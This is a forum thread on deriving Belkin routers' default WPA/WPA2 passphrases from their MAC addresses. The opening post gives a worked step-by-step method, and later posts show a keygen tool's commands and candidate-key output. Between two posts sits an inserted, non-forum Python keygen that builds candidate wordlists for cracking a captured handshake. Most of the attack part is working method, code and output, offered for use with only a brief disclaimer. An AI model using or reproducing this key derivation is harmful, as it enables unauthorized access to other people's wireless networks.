
Thread: Belkin SSID and WPA/WPA2 correlation.

  1. #1
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520

    Belkin MAC Address and WPA/WPA2 key correlation: CRACKED!

    Please do not use this on a network you do not own! I am not responsible for what you do with this information! This is just to demonstrate Belkin's SEVERE security flaw and it doesn't look like they're going to fix the issue.

    I do not own this information. All information is from this PDF, and all credit goes to Numlock. Eftecno posted this in a comment below but it is in Italian and a bit hard to follow so I'll do an example here.

    The most common SSID you will see is belkin.xxx, so I'll do an example for that. Here are the steps:

    1.) Find the WLAN MAC address of the target router. In this case, I'll pull one from eBay (looked at the pictures): 08:86:3B:05:3A:41. I don't know how long this listing will last and I hope I don't break any rules, but just to prove that this works, there is the listing. Look at the shipping price, too! ;D

    2.) Add 1 to the end of the MAC address: 08:86:3B:05:3A:42

    3.) Remove the first 2 pairs from the MAC address (08:86), so you're left with 3B:05:3A:42

    4.) Take the 8 characters in the MAC address and rearrange them so they are in this order: 62:38:51:74. So 3B:05:3A:42 would change to AB023345.

    5.) Use this conversion chart and replace the corresponding values we just calculated, AB023345.
    Code:
    0123456789ABCDEF
    944626378ace9bdf
    So,
    Code:
    A = c
    B = e
    0 = 9
    2 = 4
    3 = 6
    3 = 6
    4 = 2
    5 = 6
    The password is ce946626

    Try yours yourself now!

    Also, have a look at the PDF above. There are other algorithms for other models and a few special cases for each algorithm if one doesn't work.

    An online tool is available here.

    If you own a Belkin router, I HIGHLY recommend that you change the default password and SSID. Don't worry about MAC address filtering or hiding your SSID; those can be easily overcome. Also, disable WPS if you can, although most of the routers feature a 3-PIN-failure maximum, so if you try and fail 3 times, it locks WPS until the unit is rebooted.

    Still having trouble? Have a look at BigJim's comment on page 2; his post may be able to help you out if you're stuck!

    Good luck!
    Last edited by soxrok2212; 2015-08-28 at 22:14. Reason: typo

  2. #2
    Join Date
    2013-Sep
    Posts
    264
    That is not (almost) completely different but pretty close.

    Four 6s on one side and three 6s on the other one. And then very close letters, 2 d and one c.... There is a conversion table and a movement like in an array here, I guess.
    You should maybe try to check the serial and see if that doesn't help to make sense.

    I think there is something here, good luck

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by kcdtv View Post
    That is not (almost) completely different but pretty close.

    Four 6s on one side and three 6s on the other one. And then very close letters, 2 d and one c.... There is a conversion table and a movement like in an array here, I guess.
    You should maybe try to check the serial and see if that doesn't help to make sense.

    I think there is something here, good luck
    Apparently this was already found but they didn't release the information to the public... http://news.softpedia.com/news/Exper...s-309081.shtml

    Anyways, I was thinking they were different because I was looking at them in pairs of 2, e.g. [55][66][66][77] and [56][66][67][78]. So the pairs don't match up, but I'll look into it. I don't think it has anything to do with the serial numbers because, according to the news post, they were able to recover the password strictly from the MAC address. Thanks for the reply though!

  4. #4
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Anyone have any ideas???

  5. #5
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I'm stumped... no idea where to look for more info...

  6. #6
    Join Date
    2013-Sep
    Posts
    264
    Apparently this was already found but they didn't release the information to the public... http://news.softpedia.com/news/Exper...s-309081.shtml
    No
    Apparently they simply didn't find anything; this post is a year old and they simply didn't find the stuff.
    They were not able to see that the WPS PIN is made from the BSSID in a straight relationship, as I revealed more than one year ago: WPSPIN > Générateur PIN WPS par défaut routeurs Huawei, Belkin ... (default WPS PIN generator for Huawei, Belkin ... routers)

    For me it is total bullshitting when they pretend to have the algorithm.
    They are as close as you.
    Isn't it strange to present something and then say just after "anyway guys, with 8 hex characters, this can be bruteforced if you have
    a good card"
    Thanks for the news !!!!
    bullshit.!!!

    So they seem not to say what they know, concerned by the bad use that can be made of their discovery.
    But on the other hand they give this kind of information: "buy a good card and you can break the default password even if we are wrong"

    Moreover, the default WPA2-PSK passphrase solely consists of 8 hexadecimal digits, which means that the entropy is limited to only 32 bits (or 33 bits since some models use uppercase hex digits). After sniffing one successful association of a client to the wireless network, an attacker can carry out an offline brute-force attack to crack the password. The program oclhashcat-plus can try 131,000 passwords per second on one high end GPU (AMD Radeon hd7970) [1]. Doing a full search of the 32-bit key space takes about 9 hours at this rate.
    That makes absolutely no sense: to not demonstrate what you pretend to have discovered, but then say this obvious ****.
    Anyway, if you say something, demonstrate it; otherwise go to ****. I am not used to believing people that tell me that something is like this but refuse to demonstrate it; this is not theology but computers.
    Calling them researchers is a joke, for telling us that with oclHashcat and the latest ATI we get 100000 passwords/second...
    Calling this a full disclosure is a joke too.

    Good luck in your project because there is still something to do about these routers, with the latest N models that seem to use the same algorithm but with a 16-digit passphrase.

    That's the original, by the way: http://www.jakoblell.com/blog/2012/1...eless-routers/
    Last edited by kcdtv; 2013-11-03 at 16:51.

  7. #7
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by kcdtv View Post
    I actually e-mailed Jakob Lell and he said that he decided not to release the tables to the public...

    Anyways, I tried chopping down this post to make it sweeter but it gave me an error, I'll try again later.

  8. #8
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    double post - oops
    Last edited by soxrok2212; 2015-08-28 at 22:15.

  9. #9
    Join Date
    2013-Sep
    Posts
    264
    I don't know man, I don't believe at all that they found the algorithm... if so, anyway, it is still to be revealed, and all credits will go to the one that speaks.
    It is still impossible for me to understand the fact that on the one hand you give a way to break it by buying a video card, and on the other hand the only thing that is interesting, and that you need to expose to prove something, you do not reveal, keeping it for some obscure reason.
    Do they have stock options in AMD or what?
    This man is asking us to believe him on his word, and that's not how it works; sorry for him, that's a hard world.
    Don't give up
    Last edited by kcdtv; 2013-11-03 at 22:07.

  10. #10
    Join Date
    2014-Feb
    Posts
    1
    This was posted some time ago by Numlock on an Italian forum http://www.wifi-shark.net/forum/, he also found the algorithm.

    http://www38.zippyshare.com/v/89004997/file.html

  11. #11
    Join Date
    2014-Mar
    Posts
    2
    Quote Originally Posted by eftecno View Post
    This was posted some time ago by Numlock on an Italian forum http://www.wifi-shark.net/forum/, he also found the algorithm.

    http://www38.zippyshare.com/v/89004997/file.html
    Great! thanks for sharing

  12. #12
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by eftecno View Post
    This was posted some time ago by Numlock on an Italian forum http://www.wifi-shark.net/forum/, he also found the algorithm.

    http://www38.zippyshare.com/v/89004997/file.html
    I'm having trouble following the equation, specifically this part:

    Code:
    MAC __:__:62:38:51:74 12345678 0123456789ABCDEF 9BB03337 
     08:86:3B:B7:39:30    9BB03337 944626378ace9bdf aee96667
    I don't understand what happens here. Any ideas? Thanks for the post though!

  13. #13
    Join Date
    2014-Mar
    Posts
    2
    Quote Originally Posted by soxrok2212 View Post
    I'm having trouble following the equation, specifically this part:

    Code:
    MAC __:__:62:38:51:74 12345678 0123456789ABCDEF 9BB03337 
     08:86:3B:B7:39:30    9BB03337 944626378ace9bdf aee96667
    I don't understand what happens here. Any ideas? Thanks for the post though!

    You can't know the MAC, but you can calculate it: MAC = WLAN MAC + 1
    or in special cases MAC = WLAN MAC + 2

    08:86:3B:B7:39:2F + 1 = 08:86:3B:B7:39:30

    order according to the sequence

    Code:
    MAC __:__:62:38:51:74 12345678
        08:86:3B:B7:39:30 
    
    MAC __:__:  :  : 1:   12345678  
        08:86:  :  : 9:   9        
    
    MAC __:__: 2:  :  :   12345678 
        08:86: B:  :  :   9B      
    
    MAC __:__:  :3 :  :   12345678 
        08:86:  :B :  :   9BB
    
    MAC __:__:  :  :  : 4 12345678  
        08:86:  :  :  : 0 9BB0
    
    MAC __:__:  :  :5 :   12345678  
        08:86:  :  :3 :   9BB03        
    
    MAC __:__:6 :  :  :   12345678 
        08:86:3 :  :  :   9BB033      
    
    MAC __:__:  :  :  :7  12345678 
        08:86:  :  :  :3  9BB0333
    
    MAC __:__:  : 8:  :   12345678  
        08:86:  : 7:  :   9BB03337
    then replace the values

    Code:
    0123456789ABCDEF 9BB03337
    944626378ace9bdf 
    
    0123456789ABCDEF 9BB03337 
             a       a 
    
    0123456789ABCDEF 9BB03337 
               e     ae
    
    0123456789ABCDEF 9BB03337 
               e     aee
    
    0123456789ABCDEF 9BB03337 
    9                aee9
    
    0123456789ABCDEF 9BB03337 
       6             aee96 
    
    0123456789ABCDEF 9BB03337 
       6             aee966
    
    0123456789ABCDEF 9BB03337 
       6             aee9666
    
    0123456789ABCDEF 9BB03337 
           7         aee96667
    enjoy
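The derivation described in post #1 and stepped through above in post #13, as an added Python example (this is not code from the PDF, from Numlock, or from belkin4xx). It takes the WLAN MAC, adds the offset (1, or 2 for the special cases mentioned above), drops the first two octets, reorders the remaining eight hex characters with the 6-2-3-8-5-1-7-4 sequence, and maps each character through the 0123456789ABCDEF -> 944626378ace9bdf table. Two things in it are assumptions rather than something the thread states: the +1 is done on the whole 48-bit address, so it carries into the next octet if the last one is FF (the posts only show cases without carry), and candidate_keys() adds the +2 and uppercase variants so the output can be fed to a cracker as a tiny wordlist; the PDF's other model-specific tables are not included.

```python
"""Belkin default WPA/WPA2 key derivation as described in this thread.

Added example, not code from the PDF, Numlock, or belkin4xx.
"""
from __future__ import annotations

import re

# Output position i takes character ORDER[i] (1-based) of the last 8 hex
# characters of the LAN MAC, i.e. the "62:38:51:74" sequence from the PDF.
ORDER = (6, 2, 3, 8, 5, 1, 7, 4)

# Substitution table from the PDF: hex digit -> key character.
#   0123456789ABCDEF
#   944626378ace9bdf
SUBST = dict(zip("0123456789ABCDEF", "944626378ace9bdf"))


def parse_mac(mac: str) -> int:
    """Accept 08:86:3B:05:3A:41, 08-86-3b-05-3a-41 or 08863B053A41 and return the 48-bit value."""
    hexstr = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(hexstr) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return int(hexstr, 16)


def belkin_default_key(wlan_mac: str, offset: int = 1) -> str:
    """Derive the default key from the WLAN MAC (BSSID) printed on the router / seen in the air.

    offset=1 is the normal case (LAN MAC = WLAN MAC + 1); post #13 mentions +2 as a special case.
    """
    # Assumption: the addition is on the full 48-bit value, so a last octet of FF
    # carries into the previous one. The thread only shows examples without a carry.
    lan_mac = (parse_mac(wlan_mac) + offset) & 0xFFFFFFFFFFFF
    tail = f"{lan_mac:012X}"[4:]                      # drop the first two octets (e.g. 08:86)
    shuffled = "".join(tail[i - 1] for i in ORDER)    # e.g. 3B053A42 -> AB023345
    return "".join(SUBST[c] for c in shuffled)        # e.g. AB023345 -> ce946626


def candidate_keys(wlan_mac: str) -> list[str]:
    """Small candidate list for a cracker: +1 and +2 offsets, lower- and uppercase.

    Assumption: the uppercase variant mirrors the mixed-case output belkin4xx prints
    later in this thread; it is not something the PDF extract above spells out.
    """
    keys: list[str] = []
    for offset in (1, 2):
        key = belkin_default_key(wlan_mac, offset)
        for variant in (key, key.upper()):
            if variant not in keys:
                keys.append(variant)
    return keys


if __name__ == "__main__":
    # The two MACs worked through in posts #1 and #13 of this thread.
    for mac in ("08:86:3B:05:3A:41", "08:86:3B:B7:39:2F"):
        print(mac, "->", belkin_default_key(mac), "| candidates:", ", ".join(candidate_keys(mac)))
```

Running the script reproduces ce946626 for 08:86:3B:05:3A:41 and aee96667 for 08:86:3B:B7:39:2F; redirect the candidate list to a file to use it as a wordlist against a captured handshake.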

  14. #14
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Thanks, I figured it out last night before I checked on here, but thanks for the post! I updated the original post too and I'll reference you!

  15. #15
    Join Date
    2013-Jul
    Posts
    841
    For those that want to read the original document, the following Italian to English glossary is provided:

    caratteri: characters
    esadecimale: hexadecimal
    maiuscolo: uppercase
    conversione: conversion
    ordine: order
    modelli: models
    casi particolari: special cases

  16. #16
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Tested this on some eBay listings; it works! Anyone else have any success?

  17. #17
    Join Date
    2014-Apr
    Posts
    8
    Here you go, a proof-of-concept using the PDF:


    https://bitbucket.org/dudux/belkin4xx


    If you find out bugs or something, let me know via email.

    $ python belkin4xx.py -h
    usage: belkin4xx.py [-h] [-b [BSSID]] [-e [ESSID]] [-v] [-w [WORDLIST]]
    [-a | -l]

    >>> Keygen for WiFi routers manufactured by Belkin. So far only WiFi networks
    with essid like Belkin.XXXX, Belkin_XXXXXX, belkin.xxx and belkin.xxxx are
    likely vulnerable, although routers using those macaddresses could be
    vulnerable as well. Twitter: @enovella_ and email: ednolo[at]inf.upv.es

    optional arguments:
    -h, --help show this help message and exit
    -v, --version show program's version number and exit
    -w [WORDLIST], --wordlist [WORDLIST]
    Filename to store keys
    -a, --allkeys Create all possible cases. Definitely recommended if
    first attempt fails
    -l, --list List all vulnerable mac address so far

    required:
    -b [BSSID], --bssid [BSSID]
    Target bssid
    -e [ESSID], --essid [ESSID]
    Target essid. [BelkinXXXX,belkin.XXXX]

    (+) Help: python belkin4xx.py -b 94:44:52:00:C0E -e Belkin.c0de


    $ python belkin4xx.py -l
    [+] Possible vulnerable targets so far:

    essid: Belkin.XXXX
    essid: Belkin_XXXXXX
    essid: belkin.xxxx
    essid: belkin.xxx

    bssid: 94:44:52:uv:wx:yz
    bssid: 08:86:3B:uv:wx:yz
    bssid: EC:1A:59:uv:wx:yz

    $ python belkin4xx.py -b 94:44:52:00:C0E -e Belkin.c0de
    [+] Your WPA key might be :
    040D93B0

    $ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0
    [+] Your WPA key might be :
    d49496b9

    $ python belkin4xx.py -b 94:44:52:00:ce:d0 -a
    [+] Your WPA keys might be :
    64949db9
    D40493B0
    649996b9
    649496b9
    d49496b9
    34029DB0
    d49996b9
    D40293B0
    64999db9
    340493B0
    34009DB0
    340093B0
    34049DB0
    340293B0
    D40093B0


    $ python belkin4xx.py -b 94:44:52:00:ce:d0 -a -w keys.txt
    $ cat keys.txt
    64949db9
    D40493B0
    649996b9
    649496b9
    d49496b9
    34029DB0
    d49996b9
    D40293B0
    64999db9
    340493B0
    34009DB0
    340093B0
    34049DB0
    340293B0
    D40093B0
    Last edited by dudux; 2014-05-06 at 21:53.

  18. #18
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by dudux View Post
    Here you go a proof-of-concept by using the PDF :


    https://bitbucket.org/dudux/belkin4xx


    If you find out bugs or something, let me know via email.
    This is awesome! Can you share install instructions?

  19. #19
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212 View Post
    This is awesome! Can you share install instructions?
    Try this:

    python belkin4xx.py -b 94:44:52:00:C0:EF -e Belkin.c0de

  20. #20
    Join Date
    2014-Apr
    Posts
    8
    You can run it on Windows, Mac OS X or any Linux.

    For instance, on Debian/Ubuntu systems:

    $ sudo apt-get install git
    $ git clone https://dudux@bitbucket.org/dudux/belkin4xx.git

    And read the usage.

    P.S. If you can help me out to make it more accurate......... just send me data.

    UPDATED: More accurate and fixes
    $ python belkin4xx.py -v
    belkin4xx.py 1.4 [2014-05-06]
    Last edited by dudux; 2014-05-06 at 21:51.

  21. #21
    Join Date
    2016-Aug
    Posts
    1
    Sorry for the gravedig, but I just want to let everyone know that this still works. I just tested it on a belkin.xxx network.
